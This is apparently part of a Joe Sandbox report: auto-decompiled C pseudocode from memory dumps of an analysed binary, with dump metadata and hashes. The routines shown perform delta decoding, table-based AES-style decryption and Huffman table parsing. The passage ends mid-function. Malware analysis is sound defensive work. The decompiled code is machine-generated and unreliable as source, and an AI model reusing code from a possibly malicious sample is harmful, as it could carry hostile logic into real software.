                                                    							 *(_t363 + 0x34) = _t225;
                                                    							do {
                                                    								if( &(_t225[_t360]) >= _t327) {
                                                    									 *(_t363 + 0x3c) =  *_t360 & 0x000000ff;
                                                    									 *(_t363 + 0x3c) =  *(_t360 - 3) & 0x000000ff;
                                                    									 *(_t363 + 0x44) = E00CE614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff));
                                                    									 *(_t363 + 0x38) = E00CE614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
                                                    									_t237 = E00CE614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
                                                    									_t304 =  *((intOrPtr*)(_t363 + 0x4c));
                                                    									_t363 = _t363 + 0xc;
                                                    									_t332 =  *(_t363 + 0x2c);
                                                    									if(_t304 > _t332 || _t304 > _t237) {
                                                    										_t302 =  *(_t363 + 0x14);
                                                    										_t327 =  *(_t363 + 0x18);
                                                    										_t291 =  *(_t363 + 0x3c);
                                                    										if(_t332 > _t237) {
                                                    											_t291 =  *(_t363 + 0x38);
                                                    										}
                                                    									} else {
                                                    										_t302 =  *(_t363 + 0x14);
                                                    										_t327 =  *(_t363 + 0x18);
                                                    									}
                                                    								}
                                                    								_t228 = _t291 -  *_t302;
                                                    								_t302 = _t302 + 1;
                                                    								(_t360 - 3)[_t327] = _t228;
                                                    								_t360 =  &(_t360[3]);
                                                    								_t291 = _t228 & 0x000000ff;
                                                    								 *(_t363 + 0x14) = _t302;
                                                    								_t225 =  *(_t363 + 0x34);
                                                    							} while ( &(( *(_t363 + 0x34))[_t360]) < _t345);
                                                    							_t217 =  *(_t363 + 0x30);
                                                    							_t301 =  *(_t363 + 0x28);
                                                    							_t351 =  *(_t363 + 0x24);
                                                    							_t359 = 3;
                                                    							L65:
                                                    							_t217 =  &(_t217[1]);
                                                    							 *(_t363 + 0x30) = _t217;
                                                    						} while (_t217 < _t359);
                                                    						_t328 =  *(_t363 + 0x20);
                                                    						_t218 = _t345 - 2;
                                                    						if(_t328 >= _t218) {
                                                    							goto L95;
                                                    						}
                                                    						_t306 = _t328 + 2 + _t351;
                                                    						_t331 = (_t218 - _t328 - 1) / _t359 + 1;
                                                    						do {
                                                    							_t222 =  *((intOrPtr*)(_t306 - 1));
                                                    							 *((intOrPtr*)(_t306 - 2)) =  *((intOrPtr*)(_t306 - 2)) + _t222;
                                                    							 *_t306 =  *_t306 + _t222;
                                                    							_t306 = _t306 + _t359;
                                                    							_t331 = _t331 - 1;
                                                    						} while (_t331 != 0);
                                                    						goto L95;
                                                    					}
                                                    				}
                                                    				_t238 = _t212 - 1;
                                                    				if(_t238 == 0) {
                                                    					_t307 = __ecx[5];
                                                    					_t333 =  *__ecx;
                                                    					_t239 = __ecx[1];
                                                    					 *(_t363 + 0x30) = _t333;
                                                    					 *(_t363 + 0x34) = _t307;
                                                    					 *(_t363 + 0x38) = _t239;
                                                    					 *(_t363 + 0x40) =  &(_t333[_t307]);
                                                    					if(_t307 > 0x20000 || _t239 > 0x80 || _t239 == 0) {
                                                    						goto L96;
                                                    					} else {
                                                    						_t346 = 0;
                                                    						 *(_t363 + 0x3c) = 0;
                                                    						if(_t239 == 0) {
                                                    							goto L95;
                                                    						} else {
                                                    							goto L20;
                                                    						}
                                                    						do {
                                                    							L20:
                                                    							 *(_t363 + 0x24) =  *(_t363 + 0x24) & 0x00000000;
                                                    							 *(_t363 + 0x20) =  *(_t363 + 0x20) & 0x00000000;
                                                    							_t354 = 0;
                                                    							 *(_t363 + 0x1c) =  *(_t363 + 0x1c) & 0x00000000;
                                                    							_t292 = 0;
                                                    							 *(_t363 + 0x18) =  *(_t363 + 0x18) & 0x00000000;
                                                    							_t361 = 0;
                                                    							 *(_t363 + 0x20) = 0;
                                                    							E00CDFFF0(_t346, _t363 + 0x44, 0, 0x1c);
                                                    							 *(_t363 + 0x38) =  *(_t363 + 0x38) & 0;
                                                    							_t363 = _t363 + 0xc;
                                                    							 *(_t363 + 0x28) = _t346;
                                                    							if(_t346 >=  *(_t363 + 0x34)) {
                                                    								_t242 =  *(_t363 + 0x38);
                                                    								goto L49;
                                                    							} else {
                                                    								goto L21;
                                                    							}
                                                    							do {
                                                    								L21:
                                                    								_t308 =  *(_t363 + 0x20);
                                                    								 *(_t363 + 0x18) = _t308 -  *(_t363 + 0x1c);
                                                    								_t245 =  *(_t363 + 0x30);
                                                    								 *(_t363 + 0x1c) = _t308;
                                                    								_t335 =  *_t245;
                                                    								 *(_t363 + 0x30) =  &(_t245[1]);
                                                    								_t314 = ( *(_t363 + 0x18) * _t354 + _t361 *  *(_t363 + 0x18) + _t292 *  *(_t363 + 0x20) +  *(_t363 + 0x24) * 0x00000008 >> 0x00000003 & 0x000000ff) - (_t335 & 0x000000ff);
                                                    								 *( *(_t363 + 0x28) +  *(_t363 + 0x40)) = _t314;
                                                    								_t357 = _t335 << 3;
                                                    								 *(_t363 + 0x24) = _t314 -  *(_t363 + 0x24);
                                                    								 *(_t363 + 0x28) = _t314;
                                                    								 *((intOrPtr*)(_t363 + 0x48)) =  *((intOrPtr*)(_t363 + 0x48)) + E00CE614A(_t335, _t335 << 3);
                                                    								 *((intOrPtr*)(_t363 + 0x50)) =  *((intOrPtr*)(_t363 + 0x50)) + E00CE614A(_t335, (_t335 << 3) -  *(_t363 + 0x20));
                                                    								 *((intOrPtr*)(_t363 + 0x58)) =  *((intOrPtr*)(_t363 + 0x58)) + E00CE614A(_t335,  *(_t363 + 0x24) + (_t335 << 3));
                                                    								 *((intOrPtr*)(_t363 + 0x60)) =  *((intOrPtr*)(_t363 + 0x60)) + E00CE614A(_t335, (_t335 << 3) -  *(_t363 + 0x24));
                                                    								 *((intOrPtr*)(_t363 + 0x68)) =  *((intOrPtr*)(_t363 + 0x68)) + E00CE614A(_t335,  *(_t363 + 0x28) + (_t335 << 3));
                                                    								 *((intOrPtr*)(_t363 + 0x70)) =  *((intOrPtr*)(_t363 + 0x70)) + E00CE614A(_t335, _t357 -  *(_t363 + 0x18));
                                                    								 *((intOrPtr*)(_t363 + 0x78)) =  *((intOrPtr*)(_t363 + 0x78)) + E00CE614A(_t335, _t357 +  *(_t363 + 0x18));
                                                    								_t363 = _t363 + 0x1c;
                                                    								if(( *(_t363 + 0x2c) & 0x0000001f) != 0) {
                                                    									_t354 =  *(_t363 + 0x14);
                                                    								} else {
                                                    									_t336 =  *(_t363 + 0x44);
                                                    									_t277 = 0;
                                                    									 *(_t363 + 0x44) =  *(_t363 + 0x44) & 0;
                                                    									_t318 = 1;
                                                    									do {
                                                    										if( *(_t363 + 0x44 + _t318 * 4) < _t336) {
                                                    											_t336 =  *(_t363 + 0x44 + _t318 * 4);
                                                    											_t277 = _t318;
                                                    										}
                                                    										 *(_t363 + 0x44 + _t318 * 4) =  *(_t363 + 0x44 + _t318 * 4) & 0x00000000;
                                                    										_t318 = _t318 + 1;
                                                    									} while (_t318 < 7);
                                                    									_t354 =  *(_t363 + 0x14);
                                                    									_t278 = _t277 - 1;
                                                    									if(_t278 == 0) {
                                                    										if(_t292 >= 0xfffffff0) {
                                                    											_t292 = _t292 - 1;
                                                    										}
                                                    										goto L46;
                                                    									}
                                                    									_t279 = _t278 - 1;
                                                    									if(_t279 == 0) {
                                                    										if(_t292 < 0x10) {
                                                    											_t292 = _t292 + 1;
                                                    										}
                                                    										goto L46;
                                                    									}
                                                    									_t280 = _t279 - 1;
                                                    									if(_t280 == 0) {
                                                    										if(_t361 >= 0xfffffff0) {
                                                    											_t361 = _t361 - 1;
                                                    										}
                                                    										goto L46;
                                                    									}
                                                    									_t281 = _t280 - 1;
                                                    									if(_t281 == 0) {
                                                    										if(_t361 < 0x10) {
                                                    											_t361 = _t361 + 1;
                                                    										}
                                                    										goto L46;
                                                    									}
                                                    									_t282 = _t281 - 1;
                                                    									if(_t282 == 0) {
                                                    										if(_t354 < 0xfffffff0) {
                                                    											goto L46;
                                                    										}
                                                    										_t354 = _t354 - 1;
                                                    										L34:
                                                    										 *(_t363 + 0x14) = _t354;
                                                    										goto L46;
                                                    									}
                                                    									if(_t282 != 1 || _t354 >= 0x10) {
                                                    										goto L46;
                                                    									} else {
                                                    										_t354 = _t354 + 1;
                                                    										goto L34;
                                                    									}
                                                    								}
                                                    								L46:
                                                    								_t242 =  *(_t363 + 0x38);
                                                    								_t316 =  *(_t363 + 0x28) + _t242;
                                                    								 *(_t363 + 0x2c) =  *(_t363 + 0x2c) + 1;
                                                    								 *(_t363 + 0x28) = _t316;
                                                    							} while (_t316 <  *(_t363 + 0x34));
                                                    							_t346 =  *(_t363 + 0x3c);
                                                    							L49:
                                                    							_t346 = _t346 + 1;
                                                    							 *(_t363 + 0x3c) = _t346;
                                                    						} while (_t346 < _t242);
                                                    						goto L95;
                                                    					}
                                                    				}
                                                    				if(_t238 != 1) {
                                                    					goto L95;
                                                    				}
                                                    				_t319 = __ecx[5];
                                                    				_t362 = 0;
                                                    				_t337 = __ecx[1];
                                                    				 *(_t363 + 0x28) = _t319;
                                                    				 *(_t363 + 0x2c) = _t319 + _t319;
                                                    				if(_t319 > 0x20000 || _t337 > 0x400 || _t337 == 0) {
                                                    					goto L96;
                                                    				} else {
                                                    					_t286 = _t337;
                                                    					 *(_t363 + 0x24) = _t337;
                                                    					do {
                                                    						_t293 = 0;
                                                    						_t348 = _t319;
                                                    						if(_t319 <  *(_t363 + 0x2c)) {
                                                    							_t320 =  *(_t363 + 0x2c);
                                                    							goto L12;
                                                    							L12:
                                                    							_t287 =  *_t349;
                                                    							_t293 = _t293 -  *((intOrPtr*)(_t287 + _t362));
                                                    							_t362 = _t362 + 1;
                                                    							 *((char*)(_t287 + _t348)) = _t293;
                                                    							_t348 = _t348 + _t337;
                                                    							if(_t348 < _t320) {
                                                    								goto L12;
                                                    							} else {
                                                    								_t319 =  *(_t363 + 0x28);
                                                    								_t286 =  *(_t363 + 0x24);
                                                    								goto L14;
                                                    							}
                                                    						}
                                                    						L14:
                                                    						_t319 = _t319 + 1;
                                                    						_t286 = _t286 - 1;
                                                    						 *(_t363 + 0x28) = _t319;
                                                    						 *(_t363 + 0x24) = _t286;
                                                    					} while (_t286 != 0);
                                                    					goto L95;
                                                    				}
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                    • Instruction ID: 3028f0a382ec455514df48a3bede132fc412d5613b4bfbd030c3bf78e78dd9bd
                                                    • Opcode Fuzzy Hash: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                    • Instruction Fuzzy Hash: 01F19A71A083418FC718CF29C5D4A2EBBE5EFDA354F144A2EF49AD7252D630EA45CB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCE9B7(void* __ebx, intOrPtr __ecx, void* __esi) {
                                                    				void* _t220;
                                                    				intOrPtr _t227;
                                                    				void* _t250;
                                                    				signed char _t252;
                                                    				signed int _t300;
                                                    				signed int* _t303;
                                                    				signed char _t346;
                                                    				unsigned int _t348;
                                                    				signed int _t351;
                                                    				unsigned int _t354;
                                                    				signed int* _t357;
                                                    				signed int _t361;
                                                    				signed int _t366;
                                                    				signed int _t370;
                                                    				signed int _t374;
                                                    				signed char _t376;
                                                    				signed int* _t380;
                                                    				signed int _t387;
                                                    				signed int _t392;
                                                    				intOrPtr _t394;
                                                    				signed char _t395;
                                                    				signed char _t396;
                                                    				signed char _t397;
                                                    				unsigned int _t399;
                                                    				signed int _t402;
                                                    				unsigned int _t405;
                                                    				unsigned int _t407;
                                                    				unsigned int _t408;
                                                    				signed int _t409;
                                                    				signed int _t414;
                                                    				unsigned int _t415;
                                                    				unsigned int _t416;
                                                    				signed int _t418;
                                                    				signed int _t422;
                                                    				signed int _t423;
                                                    				intOrPtr _t425;
                                                    				signed int _t426;
                                                    				void* _t430;
                                                    				void* _t431;
                                                    
                                                    				_t407 =  *(_t430 + 0x6c);
                                                    				_t425 = __ecx;
                                                    				 *((intOrPtr*)(_t430 + 0x24)) = __ecx;
                                                    				if(_t407 != 0) {
                                                    					_t408 = _t407 >> 4;
                                                    					 *(_t430 + 0x6c) = _t408;
                                                    					if( *((char*)(__ecx)) == 0) {
                                                    						 *((intOrPtr*)(_t430 + 0x38)) = __ecx + 8;
                                                    						E00CE0320(_t430 + 0x5c, __ecx + 8, 0x10);
                                                    						_t431 = _t430 + 0xc;
                                                    						if(_t408 == 0) {
                                                    							L13:
                                                    							return E00CE0320( *((intOrPtr*)(_t431 + 0x38)), _t431 + 0x58, 0x10);
                                                    						}
                                                    						_t392 =  *(_t431 + 0x68);
                                                    						 *(_t431 + 0x24) = _t392 + 8;
                                                    						_t227 =  *((intOrPtr*)(_t431 + 0x78));
                                                    						_t394 = _t392 - _t227 - 8;
                                                    						 *((intOrPtr*)(_t431 + 0x34)) = _t394;
                                                    						_t357 = _t227 + 8;
                                                    						 *(_t431 + 0x28) = _t357;
                                                    						do {
                                                    							_t414 =  *(_t425 + 4);
                                                    							 *(_t431 + 0x30) = _t357 + _t394;
                                                    							E00CCE985(_t431 + 0x54, _t357 + _t394, (_t414 << 4) + 0x18 + _t425);
                                                    							_t395 =  *(_t431 + 0x4c);
                                                    							 *(_t431 + 0x10) =  *(0xd061c8 + (_t395 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x53) & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x56) & 0x000000ff) * 4);
                                                    							_t346 =  *(_t431 + 0x58);
                                                    							_t361 =  *(_t431 + 0x10) ^  *(0xd065c8 + (_t346 & 0x000000ff) * 4);
                                                    							 *(_t431 + 0x10) = _t361;
                                                    							 *(_t431 + 0x3c) = _t361;
                                                    							_t396 =  *(_t431 + 0x50);
                                                    							_t366 =  *(0xd065c8 + (_t395 & 0x000000ff) * 4) ^  *(0xd061c8 + (_t396 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x57) & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x5a) & 0x000000ff) * 4);
                                                    							 *(_t431 + 0x1c) = _t366;
                                                    							 *(_t431 + 0x40) = _t366;
                                                    							_t397 =  *(_t431 + 0x54);
                                                    							 *(_t431 + 0x14) =  *(0xd069c8 + ( *(_t431 + 0x4e) & 0x000000ff) * 4) ^  *(0xd065c8 + (_t396 & 0x000000ff) * 4);
                                                    							_t370 =  *(_t431 + 0x14) ^  *(0xd061c8 + (_t397 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x5b) & 0x000000ff) * 4);
                                                    							 *(_t431 + 0x14) = _t370;
                                                    							 *(_t431 + 0x44) = _t370;
                                                    							 *(_t431 + 0x18) =  *(0xd06dc8 + ( *(_t431 + 0x4f) & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x52) & 0x000000ff) * 4);
                                                    							_t374 =  *(_t431 + 0x18) ^  *(0xd065c8 + (_t397 & 0x000000ff) * 4) ^  *(0xd061c8 + (_t346 & 0x000000ff) * 4);
                                                    							_t250 = _t414 - 1;
                                                    							 *(_t431 + 0x18) = _t374;
                                                    							 *(_t431 + 0x48) = _t374;
                                                    							if(_t250 <= 1) {
                                                    								goto L9;
                                                    							}
                                                    							_t409 =  *(_t431 + 0x1c);
                                                    							_t422 = (_t250 + 2 << 4) + _t425;
                                                    							_t426 =  *(_t431 + 0x10);
                                                    							 *(_t431 + 0x18) = _t422;
                                                    							 *(_t431 + 0x20) = _t250 - 1;
                                                    							do {
                                                    								_t405 =  *_t422 ^  *(_t431 + 0x14);
                                                    								 *(_t431 + 0x10) =  *(_t422 - 8) ^ _t426;
                                                    								 *(_t431 + 0x1c) =  *(_t422 + 4) ^ _t374;
                                                    								_t354 =  *(_t422 - 4) ^ _t409;
                                                    								_t423 =  *(_t431 + 0x1c);
                                                    								_t426 =  *(0xd069c8 + (_t405 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd065c8 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd06dc8 + (_t354 >> 0x18) * 4) ^  *(0xd061c8 + ( *(_t431 + 0x10) & 0x000000ff) * 4);
                                                    								 *(_t431 + 0x3c) = _t426;
                                                    								_t409 =  *(0xd069c8 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd065c8 + ( *(_t431 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd06dc8 + (_t405 >> 0x18) * 4) ^  *(0xd061c8 + (_t354 & 0x000000ff) * 4);
                                                    								 *(_t431 + 0x40) = _t409;
                                                    								_t387 =  *(0xd065c8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd06dc8 + (_t423 >> 0x18) * 4) ^  *(0xd061c8 + (_t405 & 0x000000ff) * 4);
                                                    								 *(_t431 + 0x14) = _t387;
                                                    								 *(_t431 + 0x44) = _t387;
                                                    								_t422 =  *(_t431 + 0x18) - 0x10;
                                                    								 *(_t431 + 0x18) = _t422;
                                                    								_t374 =  *(0xd069c8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd065c8 + (_t405 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x10) >> 0x18) * 4) ^  *(0xd061c8 + (_t423 & 0x000000ff) * 4);
                                                    								_t132 = _t431 + 0x20;
                                                    								 *_t132 =  *(_t431 + 0x20) - 1;
                                                    								 *(_t431 + 0x48) = _t374;
                                                    							} while ( *_t132 != 0);
                                                    							 *(_t431 + 0x1c) = _t409;
                                                    							_t408 =  *(_t431 + 0x74);
                                                    							 *(_t431 + 0x10) = _t426;
                                                    							_t425 =  *((intOrPtr*)(_t431 + 0x2c));
                                                    							 *(_t431 + 0x18) = _t374;
                                                    							L9:
                                                    							_t252 =  *(_t425 + 0x28) ^  *(_t431 + 0x10);
                                                    							 *(_t431 + 0x20) = _t252;
                                                    							 *(_t431 + 0x4c) = _t252;
                                                    							_t376 =  *(_t425 + 0x34) ^  *(_t431 + 0x18);
                                                    							 *(_t431 + 0x3c) =  *((intOrPtr*)((_t252 & 0x000000ff) + 0xd050c8));
                                                    							_t399 =  *(_t425 + 0x30) ^  *(_t431 + 0x14);
                                                    							_t348 =  *(_t425 + 0x2c) ^  *(_t431 + 0x1c);
                                                    							 *((char*)(_t431 + 0x3d)) =  *((intOrPtr*)((_t376 >> 0x00000008 & 0x000000ff) + 0xd050c8));
                                                    							_t415 =  *(_t431 + 0x20);
                                                    							 *(_t431 + 0x54) = _t399;
                                                    							 *(_t431 + 0x50) = _t348;
                                                    							 *((char*)(_t431 + 0x3e)) =  *((intOrPtr*)((_t399 >> 0x00000010 & 0x000000ff) + 0xd050c8));
                                                    							 *(_t431 + 0x58) = _t376;
                                                    							 *((char*)(_t431 + 0x3f)) =  *((intOrPtr*)((_t348 >> 0x18) + 0xd050c8));
                                                    							 *(_t431 + 0x40) =  *((intOrPtr*)((_t348 & 0x000000ff) + 0xd050c8));
                                                    							 *((char*)(_t431 + 0x41)) =  *((intOrPtr*)((_t415 >> 0x00000008 & 0x000000ff) + 0xd050c8));
                                                    							 *((char*)(_t431 + 0x42)) =  *((intOrPtr*)((_t376 >> 0x00000010 & 0x000000ff) + 0xd050c8));
                                                    							 *((char*)(_t431 + 0x43)) =  *((intOrPtr*)((_t399 >> 0x18) + 0xd050c8));
                                                    							 *(_t431 + 0x44) =  *((intOrPtr*)((_t399 & 0x000000ff) + 0xd050c8));
                                                    							 *((char*)(_t431 + 0x45)) =  *((intOrPtr*)((_t348 >> 0x00000008 & 0x000000ff) + 0xd050c8));
                                                    							_t416 = _t415 >> 0x18;
                                                    							 *((char*)(_t431 + 0x46)) =  *((intOrPtr*)((_t415 >> 0x00000010 & 0x000000ff) + 0xd050c8));
                                                    							 *((char*)(_t431 + 0x47)) =  *((intOrPtr*)((_t376 >> 0x18) + 0xd050c8));
                                                    							 *(_t431 + 0x48) =  *((intOrPtr*)((_t376 & 0x000000ff) + 0xd050c8));
                                                    							_t402 =  *(_t425 + 0x18) ^  *(_t431 + 0x3c);
                                                    							 *((char*)(_t431 + 0x49)) =  *((intOrPtr*)((_t399 >> 0x00000008 & 0x000000ff) + 0xd050c8));
                                                    							 *((char*)(_t431 + 0x4a)) =  *((intOrPtr*)((_t348 >> 0x00000010 & 0x000000ff) + 0xd050c8));
                                                    							_t186 = _t416 + 0xd050c8; // 0x30d56a09
                                                    							 *((char*)(_t431 + 0x4b)) =  *_t186;
                                                    							_t300 =  *(_t425 + 0x24) ^  *(_t431 + 0x48);
                                                    							_t418 =  *(_t425 + 0x1c) ^  *(_t431 + 0x40);
                                                    							_t351 =  *(_t425 + 0x20) ^  *(_t431 + 0x44);
                                                    							 *(_t431 + 0x20) = _t300;
                                                    							if( *((char*)(_t425 + 1)) != 0) {
                                                    								_t402 = _t402 ^  *(_t431 + 0x5c);
                                                    								_t418 = _t418 ^  *(_t431 + 0x60);
                                                    								_t351 = _t351 ^  *(_t431 + 0x64);
                                                    								 *(_t431 + 0x20) = _t300 ^  *(_t431 + 0x68);
                                                    							}
                                                    							 *(_t431 + 0x5c) =  *( *(_t431 + 0x30));
                                                    							_t303 =  *(_t431 + 0x24);
                                                    							 *(_t431 + 0x60) =  *(_t303 - 4);
                                                    							 *(_t431 + 0x64) =  *_t303;
                                                    							 *(_t431 + 0x68) = _t303[1];
                                                    							_t380 =  *(_t431 + 0x28);
                                                    							 *(_t431 + 0x24) =  &(_t303[4]);
                                                    							 *(_t380 - 8) = _t402;
                                                    							_t380[1] =  *(_t431 + 0x20);
                                                    							_t394 =  *((intOrPtr*)(_t431 + 0x34));
                                                    							 *(_t380 - 4) = _t418;
                                                    							 *_t380 = _t351;
                                                    							_t357 =  &(_t380[4]);
                                                    							_t408 = _t408 - 1;
                                                    							 *(_t431 + 0x28) = _t357;
                                                    							 *(_t431 + 0x74) = _t408;
                                                    						} while (_t408 != 0);
                                                    						goto L13;
                                                    					}
                                                    					return E00CCEE7A( *((intOrPtr*)(_t430 + 0x70)), _t408,  *((intOrPtr*)(_t430 + 0x70)));
                                                    				}
                                                    				return _t220;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26a8dd36336a707e068e9f74afd4239eb0b2051b1b3d6d887f634067d5cce4b3
                                                    • Instruction ID: ec66eb155e3c13712036ee14e0958eab93a223787c2a62ba54d81ffba5ee5f88
                                                    • Opcode Fuzzy Hash: 26a8dd36336a707e068e9f74afd4239eb0b2051b1b3d6d887f634067d5cce4b3
                                                    • Instruction Fuzzy Hash: 2DE128755083948FC304CF29D89096ABFF0AF9A310F45495EF9D897392C235EA19DFA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E00CD4088(void* __ecx, void* __edx) {
                                                    				void* __edi;
                                                    				signed int _t82;
                                                    				signed int _t87;
                                                    				signed int _t92;
                                                    				signed int _t93;
                                                    				signed int _t94;
                                                    				signed int _t97;
                                                    				signed int _t98;
                                                    				void* _t99;
                                                    				void* _t101;
                                                    				void* _t121;
                                                    				signed int _t130;
                                                    				signed int _t139;
                                                    				signed int _t140;
                                                    				signed int _t149;
                                                    				signed int _t151;
                                                    				void* _t153;
                                                    				signed int _t156;
                                                    				signed int _t157;
                                                    				intOrPtr* _t158;
                                                    				intOrPtr* _t167;
                                                    				signed int _t170;
                                                    				void* _t171;
                                                    				signed int _t174;
                                                    				void* _t179;
                                                    				unsigned int _t181;
                                                    				void* _t184;
                                                    				signed int _t185;
                                                    				intOrPtr* _t186;
                                                    				void* _t187;
                                                    				signed int _t188;
                                                    				signed int _t189;
                                                    				intOrPtr* _t190;
                                                    				signed int _t193;
                                                    				signed int _t198;
                                                    				void* _t201;
                                                    
                                                    				_t179 = __edx;
                                                    				_t187 = __ecx;
                                                    				_t186 = __ecx + 4;
                                                    				if( *_t186 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19 || E00CD4DC4(__ecx) != 0) {
                                                    					E00CCA881(_t186,  ~( *(_t187 + 8)) & 0x00000007);
                                                    					_t82 = E00CCA898(_t186);
                                                    					_t205 = _t82 & 0x00008000;
                                                    					if((_t82 & 0x00008000) == 0) {
                                                    						_t139 = 0;
                                                    						 *((intOrPtr*)(_t187 + 0xe65c)) = 0;
                                                    						 *((intOrPtr*)(_t187 + 0x98d0)) = 0;
                                                    						 *((intOrPtr*)(_t187 + 0x98d4)) = 0;
                                                    						__eflags = _t82 & 0x00004000;
                                                    						if((_t82 & 0x00004000) == 0) {
                                                    							E00CDFFF0(_t186, _t187 + 0xe4c8, 0, 0x194);
                                                    							_t201 = _t201 + 0xc;
                                                    						}
                                                    						E00CCA881(_t186, 2);
                                                    						do {
                                                    							 *(_t201 + 0x14) = E00CCA898(_t186) >> 0xc;
                                                    							E00CCA881(_t186, 4);
                                                    							_t87 =  *(_t201 + 0x10);
                                                    							__eflags = _t87 - 0xf;
                                                    							if(_t87 != 0xf) {
                                                    								 *(_t201 + _t139 + 0x14) = _t87;
                                                    								goto L15;
                                                    							}
                                                    							_t188 = E00CCA898(_t186) >> 0x0000000c & 0x000000ff;
                                                    							E00CCA881(_t186, 4);
                                                    							__eflags = _t188;
                                                    							if(_t188 != 0) {
                                                    								_t189 = _t188 + 2;
                                                    								__eflags = _t189;
                                                    								while(1) {
                                                    									_t189 = _t189 - 1;
                                                    									__eflags = _t139 - 0x14;
                                                    									if(_t139 >= 0x14) {
                                                    										break;
                                                    									}
                                                    									 *(_t201 + _t139 + 0x14) = 0;
                                                    									_t139 = _t139 + 1;
                                                    									__eflags = _t189;
                                                    									if(_t189 != 0) {
                                                    										continue;
                                                    									}
                                                    									break;
                                                    								}
                                                    								_t139 = _t139 - 1;
                                                    								goto L15;
                                                    							}
                                                    							 *(_t201 + _t139 + 0x14) = 0xf;
                                                    							L15:
                                                    							_t139 = _t139 + 1;
                                                    							__eflags = _t139 - 0x14;
                                                    						} while (_t139 < 0x14);
                                                    						_push(0x14);
                                                    						_t190 = _t187 + 0x3c50;
                                                    						_push(_t190);
                                                    						_push(_t201 + 0x1c);
                                                    						E00CD3797();
                                                    						_t140 = 0;
                                                    						__eflags = 0;
                                                    						do {
                                                    							__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84)) - 5;
                                                    							if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84)) - 5) {
                                                    								L19:
                                                    								_t92 = E00CCA89D(_t186);
                                                    								_t93 =  *(_t190 + 0x84);
                                                    								_t181 = _t92 & 0x0000fffe;
                                                    								__eflags = _t181 -  *((intOrPtr*)(_t190 + 4 + _t93 * 4));
                                                    								if(_t181 >=  *((intOrPtr*)(_t190 + 4 + _t93 * 4))) {
                                                    									_t149 = 0xf;
                                                    									_t94 = _t93 + 1;
                                                    									 *(_t201 + 0x10) = _t149;
                                                    									__eflags = _t94 - _t149;
                                                    									if(_t94 >= _t149) {
                                                    										L27:
                                                    										_t151 =  *(_t186 + 4) +  *(_t201 + 0x10);
                                                    										 *_t186 =  *_t186 + (_t151 >> 3);
                                                    										_t97 =  *(_t201 + 0x10);
                                                    										 *(_t186 + 4) = _t151 & 0x00000007;
                                                    										_t153 = 0x10;
                                                    										_t156 =  *((intOrPtr*)(_t190 + 0x44 + _t97 * 4)) + (_t181 -  *((intOrPtr*)(_t190 + _t97 * 4)) >> _t153 - _t97);
                                                    										__eflags = _t156 -  *_t190;
                                                    										asm("sbb eax, eax");
                                                    										_t98 = _t97 & _t156;
                                                    										__eflags = _t98;
